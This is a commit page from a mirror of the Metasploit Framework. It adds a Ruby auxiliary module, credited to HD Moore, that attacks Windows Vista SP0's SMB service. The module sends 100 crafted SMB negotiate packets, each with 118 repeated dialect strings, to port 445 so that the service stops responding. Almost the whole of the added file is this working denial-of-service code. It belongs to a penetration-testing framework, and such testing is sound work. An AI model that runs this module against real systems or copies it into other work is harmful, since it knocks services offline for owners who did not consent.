1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Adds keywords to some missing modules, adds an old/lame DoS module that was fixed in Vista SP1

git-svn-id: file:///home/svn/framework3/trunk@5849 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2008-11-07 22:11:58 +00:00
parent 7c03f14792
commit bc7b19f554
2 changed files with 73 additions and 1 deletions

View File

@ -0,0 +1,73 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
class Metasploit3 < Msf::Auxiliary
include Auxiliary::Dos
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Vista SP0 SMB Negotiate Protocol DoS',
'Description' => %q{
This module exploits a flaw in Windows Vista that allows a remote
unauthenticated attacker to disable the SMB service. This vulnerability
was silently fixed in Microsoft Vista Service Pack 1.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))
register_options([Opt::RPORT(445)], self.class)
end
def run
print_status("Sending 100 negotiate requests...");
# 100 requests ensure that the bug is reliably hit
1.upto(100) do |i|
begin
connect
# 118 dialects are needed to trigger a non-response
dialects = ['NT LM 0.12'] * 118
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0xc853
pkt['Payload'].v['Payload'] = data
pkt['Payload']['SMB'].v['ProcessID'] = rand(0x10000)
pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000)
sock.put(pkt.to_s)
disconnect
rescue ::Interrupt
raise $!
rescue ::Exception
print_status("Error at iteration #{i}: #{$!.class} #{$!}")
return
end
end
end
end

View File

@ -11,7 +11,6 @@
require 'msf/core'
require 'base64'
class Metasploit3 < Msf::Exploit::Remote